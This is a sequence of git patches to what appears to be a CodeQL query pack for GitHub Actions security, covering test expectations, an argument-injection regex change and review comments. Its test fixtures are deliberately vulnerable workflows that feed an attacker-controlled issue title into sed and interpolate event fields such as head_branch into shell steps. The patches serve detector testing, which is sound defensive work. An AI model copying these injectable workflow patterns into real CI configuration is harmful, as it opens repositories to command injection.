Uses Step | semmle.label | Uses Step | 
@@ -41,6 +44,7 @@ nodes | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | subpaths #select +| .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | ./x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | sh foo/cmd\n | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index a18aa5bdc80..18ad272f803 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -1,4 +1,5 @@ edges +| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | 
@@ -13,6 +14,8 @@ edges | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | nodes +| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 124a26b1d47..41c465dcc27 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -1,6 +1,7 @@ | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref '2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref '1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning7.yml:8:9:16:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning7.yml' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning7.yml:8:9:16:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning7.yml:9:9:17:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning7.yml' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning7.yml:9:9:17:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning8.yml' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | Uses Step | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | 
| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref '3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 7b758b0da6d..b4a099672a4 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -9,9 +9,10 @@ edges | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | -| .github/workflows/artifactpoisoning7.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:16:9:20:6 | Run Step: artifact | -| .github/workflows/artifactpoisoning7.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:20:9:21:52 | Run Step | -| .github/workflows/artifactpoisoning7.yml:16:9:20:6 | Run Step: artifact | .github/workflows/artifactpoisoning7.yml:20:9:21:52 | Run Step | +| .github/workflows/artifactpoisoning7.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:17:9:21:6 | Run Step: artifact | +| .github/workflows/artifactpoisoning7.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:21:9:22:52 | Run Step | +| .github/workflows/artifactpoisoning7.yml:17:9:21:6 | Run Step: artifact | .github/workflows/artifactpoisoning7.yml:21:9:22:52 | Run Step | +| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:16:9:18:40 | Run Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | | .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | 
@@ -326,6 +327,7 @@ edges | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test8.yml:20:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:29:2 | Run Step | +| .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:33:9:37:34 | Run Step | 
@@ -360,5 +362,6 @@ edges | .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. | +| .github/workflows/test9.yml:16:9:17:48 | Run Step | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | From 8d75250da74bad44e301d4a9c7553500948b5e07 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 10:05:29 +0200 Subject: [PATCH 0396/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 3d20e00ddde..79545959a7d 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
@@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.16 +version: 0.1.17 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 6b41b38f9a4..30ed4dc6dae 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.16 +version: 0.1.17 groups: [actions, queries] suites: codeql-suites extractor: javascript From adbb2364655e3f871e5fd04764edeaa8dd90d874 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 10:45:49 +0200 Subject: [PATCH 0397/1267] fix(query): Better identification of argument injection commands --- ql/lib/codeql/actions/config/Config.qll | 5 ++++- ql/lib/ext/config/argument_injection_sinks.yml | 2 +- .../CWE-094/.github/workflows/arg_injection.yml | 8 ++++---- .../CWE-094/ArgumentInjectionCritical.expected | 12 +++++++++--- .../CWE-094/ArgumentInjectionMedium.expected | 8 ++++++-- 5 files changed, 24 insertions(+), 11 deletions(-) diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index 1cc8ce4eb8a..8d97e63786b 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -91,5 +91,8 @@ predicate untrustedEventPropertiesDataModel(string property, string kind) { * - argument_group: capture group for the argument. */ predicate argumentInjectionSinksDataModel(string regexp, int command_group, int argument_group) { - Extensions::argumentInjectionSinksDataModel(regexp, command_group, argument_group) + exists(string sub_regexp | + Extensions::argumentInjectionSinksDataModel(sub_regexp, command_group, argument_group) and + regexp = ".*(^|;|\\$\\(|`|\\||&&)\\s*" + sub_regexp + "\\s*(;|\\||\\)|`|-|&&|$).*" + ) } diff --git a/ql/lib/ext/config/argument_injection_sinks.yml b/ql/lib/ext/config/argument_injection_sinks.yml index 8a9350cfebb..727c982d2ec 100644 
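Review bot: The wrapper built in `argumentInjectionSinksDataModel` puts a capturing group in front of `sub_regexp`, so `command_group` and `argument_group` no longer index into the pattern a model row declares; the `argument_injection_sinks.yml` hunk has to move its row from `1, 2` to `2, 3` to compensate. Making both delimiter groups non-capturing, `(?:^|;|…)` before and `(?:;|\\||…)` after, keeps row indices relative to the row's own pattern, and the row can stay at `1, 2`. If the offset is kept, the doc comment (it starts above this hunk) should say that group numbers are shifted by one. Separately, the `-` in the trailing alternation looks like it ends the lazy argument capture at the first hyphen, so a `sed` call with an option flag before the tainted argument presumably captures an empty argument. How `argument_group` is consumed is not visible here, so a test step with a flag would confirm this.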
--- a/ql/lib/ext/config/argument_injection_sinks.yml +++ b/ql/lib/ext/config/argument_injection_sinks.yml @@ -4,5 +4,5 @@ extensions: extensible: argumentInjectionSinksDataModel # https://gtfobins.github.io/ data: - - [".*(sed) (.*)", 1, 2] + - ["(sed)(.*?)", 2, 3] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml index b5478a5e136..19435af16d3 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml @@ -10,10 +10,10 @@ jobs: env: TITLE: ${{github.event.issue.title}} steps: - - run: | - echo "s/FOO/$TITLE/g" - - run: | - sed "s/FOO/$TITLE/g" + - run: echo "s/FOO/$TITLE/g" + - run: sed "s/FOO/$TITLE/g" + - run: echo "foo" | sed "s/FOO/$TITLE/g" > bar + - run: echo $(echo "foo" | sed "s/FOO/$TITLE/g" > bar) diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected index 5b82e52682e..21483efe36c 100644 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected 
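Review bot: The new row `["(sed)(.*?)", 2, 3]` no longer requires anything between the command name and its arguments, unlike the old pattern, which required a space after `sed`. Any command that merely begins with `sed` after a separator would therefore be reported as a `sed` sink, which costs precision. A word boundary restores the intent without changing the groups: `- ["(sed)\\b(.*?)", 2, 3]`. A short comment on the row should also record that the indices count the leading group added by the wrapper in `Config.qll`.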
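Review bot: The `arg_injection.yml` fixture replaces both block-scalar (`run: |`) steps with single-line ones, so no multi-line script is covered any more. The new wrapper regexp relies on `^`, `$` and `.*`, so whether a `sed` on a later line of a multi-line script still matches depends on how the pattern is applied, which is outside this hunk. Keeping one block-scalar step with the sink on the second line would pin that behaviour: `- run: |`, then `echo "start"`, then `sed "s/FOO/$TITLE/g"`. A negative step whose command only starts with `sed` would also guard against over-matching.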
@@ -1,8 +1,14 @@ edges -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | | nodes | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | semmle.label | sed "s/FOO/$TITLE/g"\n | +| .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | +| .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | +| .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | subpaths #select -| .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | sed | +| .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | sed | +| .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | sed | +| .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | sed | diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected index 37fd97270d7..c2ff2885a99 100644 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected 
@@ -1,7 +1,11 @@ edges -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | | nodes | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | semmle.label | sed "s/FOO/$TITLE/g"\n | +| .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | +| .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | +| .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | subpaths #select From 56af52a729c8a614b2cb4c3784b13622dc519110 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 10:46:37 +0200 Subject: [PATCH 0398/1267] feat(tests): New tests for Command Injection Injections on a workflow_run triggered protected by a allow branches list should not be reported as critical --- .../CWE-094/.github/workflows/test10.yml | 568 ++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 6 + .../CWE-094/CodeInjectionMedium.expected | 12 + 3 files changed, 586 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml new file mode 100644 index 00000000000..1bc02ccd826 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml 
@@ -0,0 +1,568 @@ +name: Self-hosted runner (push) + +on: + workflow_run: + workflows: ["Self-hosted runner (push-caller)"] + branches: ["main"] + types: [completed] + push: + branches: + - ci_* + - ci-* + paths: + - "src/**" + - "tests/**" + - ".github/**" + - "templates/**" + - "utils/**" + repository_dispatch: + +env: + HF_HOME: /mnt/cache + TRANSFORMERS_IS_CI: yes + OMP_NUM_THREADS: 8 + MKL_NUM_THREADS: 8 + PYTEST_TIMEOUT: 60 + TF_FORCE_GPU_ALLOW_GROWTH: true + RUN_PT_TF_CROSS_TESTS: 1 + CUDA_VISIBLE_DEVICES: 0,1 + +jobs: + setup: + name: Setup + strategy: + matrix: + machine_type: [single-gpu, multi-gpu] + runs-on: ['${{ matrix.machine_type }}', nvidia-gpu, t4, push-ci] + container: + image: huggingface/transformers-all-latest-gpu-push-ci + options: --gpus 0 --shm-size "16gb" --ipc host -v /mnt/cache/.cache/huggingface:/mnt/cache/ + outputs: + matrix: ${{ steps.set-matrix.outputs.matrix }} + test_map: ${{ steps.set-matrix.outputs.test_map }} + steps: + # Necessary to get the correct branch name and commit SHA for `workflow_run` event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # `CI_BRANCH_PUSH`: The branch name from the push event + # `CI_BRANCH_WORKFLOW_RUN`: The name of the branch on which this workflow is triggered by `workflow_run` event + # `CI_BRANCH`: The non-empty branch name from the above two (one and only one of them is empty) + # `CI_SHA_PUSH`: The commit SHA from the push event + # `CI_SHA_WORKFLOW_RUN`: The commit SHA that triggers this workflow by `workflow_run` event + # `CI_SHA`: The non-empty commit SHA from the above two (one and only one of them is empty) + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ 
github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! -z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - name: Update clone using environment variables + working-directory: /transformers + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - name: Cleanup + working-directory: /transformers + run: | + rm -rf tests/__pycache__ + rm -rf tests/models/__pycache__ + rm -rf reports + + - name: Show installed libraries and their versions + working-directory: /transformers + run: pip freeze + + - name: Fetch the tests to run + working-directory: /transformers + # TODO: add `git-python` in the docker images + run: | + pip install --upgrade git-python + python3 utils/tests_fetcher.py --diff_with_last_commit | tee test_preparation.txt + + - name: Report fetched tests + uses: actions/upload-artifact@v4 + with: + name: test_fetched + path: /transformers/test_preparation.txt + + - id: set-matrix + name: Organize tests into models + working-directory: /transformers + # The `keys` is used as GitHub actions matrix for jobs, i.e. `models/bert`, `tokenization`, `pipeline`, etc. + # The `test_map` is used to get the actual identified test files under each key. 
+ # If no test to run (so no `test_map.json` file), create a dummy map (empty matrix will fail) + run: | + if [ -f test_map.json ]; then + keys=$(python3 -c 'import json; fp = open("test_map.json"); test_map = json.load(fp); fp.close(); d = list(test_map.keys()); print(d)') + test_map=$(python3 -c 'import json; fp = open("test_map.json"); test_map = json.load(fp); fp.close(); print(test_map)') + else + keys=$(python3 -c 'keys = ["dummy"]; print(keys)') + test_map=$(python3 -c 'test_map = {"dummy": []}; print(test_map)') + fi + echo $keys + echo $test_map + echo "matrix=$keys" >> $GITHUB_OUTPUT + echo "test_map=$test_map" >> $GITHUB_OUTPUT + + run_tests_single_gpu: + name: Model tests + needs: setup + # `dummy` means there is no test to run + if: contains(fromJson(needs.setup.outputs.matrix), 'dummy') != true + strategy: + fail-fast: false + matrix: + folders: ${{ fromJson(needs.setup.outputs.matrix) }} + machine_type: [single-gpu] + runs-on: ['${{ matrix.machine_type }}', nvidia-gpu, t4, push-ci] + container: + image: huggingface/transformers-all-latest-gpu-push-ci + options: --gpus 0 --shm-size "16gb" --ipc host -v /mnt/cache/.cache/huggingface:/mnt/cache/ + steps: + # Necessary to get the correct branch name and commit SHA for `workflow_run` event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # For the meaning of these environment variables, see the job `Setup` + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! 
-z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - name: Update clone using environment variables + working-directory: /transformers + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - name: Reinstall transformers in edit mode (remove the one installed during docker image build) + working-directory: /transformers + run: python3 -m pip uninstall -y transformers && python3 -m pip install -e . + + - name: Echo folder ${{ matrix.folders }} + shell: bash + # For folders like `models/bert`, set an env. var. (`matrix_folders`) to `models_bert`, 